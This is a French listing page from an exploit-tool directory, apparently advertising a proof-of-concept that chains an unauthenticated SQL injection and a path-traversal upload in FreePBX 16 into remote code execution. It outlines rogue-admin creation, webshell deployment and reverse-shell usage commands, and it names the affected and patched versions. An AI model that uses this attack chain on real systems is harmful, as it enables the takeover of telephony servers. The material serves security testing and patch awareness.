Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
FreePBX-CVE-2025-57819-RCE — Chaîne d'exploitation d'injection SQL non authentifiée et de téléchargement de fichier arbitraire pour FreePBX 16, réalisant une exécution de code à distance via la création d'administrateur et le déploiement de webshell. | Kitploit
Outils/GitHubGitHub/0xehab/freepbx-cve-2025-57819-rce
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHub0xehab/freepbx-cve-2025-57819-rce

FreePBX-CVE-2025-57819-RCE

Chaîne d'exploitation d'injection SQL non authentifiée et de téléchargement de fichier arbitraire pour FreePBX 16, réalisant une exécution de code à distance via la création d'administrateur et le déploiement de webshell.

Voir le dépôt
131il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

FreePBX 16 — SQLi non authentifié vers RCE

Exploit proof-of-concept enchaînant deux vulnérabilités FreePBX pour passer de zéro accès à exécution de code à distance sur FreePBX 16.

CVEComposantImpact
CVE-2025-57819Chargeur de module Endpoint (paramètre brand)Injection SQL empilée non authentifiée
CVE-2025-61678Téléchargeur de firmware Endpoint Manager (paramètre fwbrand)Téléchargement arbitraire de fichiers authentifié (traversée de chemin)

Comment ça marche

  1. Créer un administrateur (CVE-2025-57819) — une injection SQL empilée accessible sans authentification via le chargeur de point de terminaison avec espace de noms est utilisée pour INSERT un tout nouvel administrateur avec accès complet directement dans la table ampusers.
  2. Authentifier — le PoC se connecte au panneau d'administration en tant qu'utilisateur fraîchement créé.
  3. Déposer une webshell (CVE-2025-61678) — le gestionnaire de téléchargement de firmware d'Endpoint Manager est exploité avec une traversée ../../../var/www/html/<dir> dans fwbrand pour écrire une webshell PHP dans la racine web.
  4. Exécuter — exécuter une commande unique ou recevoir un shell inversé interactif.

Versions affectées

FreePBX 16 (module Endpoint antérieur à 16.0.92). Également corrigé dans 17.0.6. Mettez à jour vers une version corrigée.

Utilisation

root@kitploit:~
# single command
python3 exploit.py --rhost pbx.example.com --command "id"

# interactive reverse shell (auto-listener via pwntools)
python3 exploit.py --rhost pbx.example.com --lhost 10.0.0.5 --lport 4444

# plain HTTP / custom port
python3 exploit.py --rhost pbx.example.com --http --rport 80 --command "uname -a"

Options

OptionDescription
--rhostHôte cible (obligatoire)
--rportPort cible (par défaut 443)
--httpUtiliser HTTP au lieu de HTTPS
--lhost / --lportAdresse de rappel du shell inversé
--commandExécuter une seule commande au lieu d'un shell

Prérequis

root@kitploit:~
pip install requests pwntools

Avertissement

Pour les tests de sécurité autorisés et à des fins éducatives uniquement. Utilisez-le exclusivement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite explicite de tester. L'auteur décline toute responsabilité en cas d'utilisation abusive.

Mots-clés

FreePBX · FreePBX 16 · FreePBX 16.0.40.7 · Sangoma PBX · Asterisk · CVE-2025-57819 · CVE-2025-61678 · injection SQL non authentifiée · injection de requête empilée · module Endpoint · Endpoint Manager · téléchargement de fichier authentifié · traversée de chemin · exécution de code à distance · RCE · PoC · exploit · sécurité VoIP


linkedin: ehxb · medium.com/@Ehxb · github 0xEhxb

Télécharger l’outil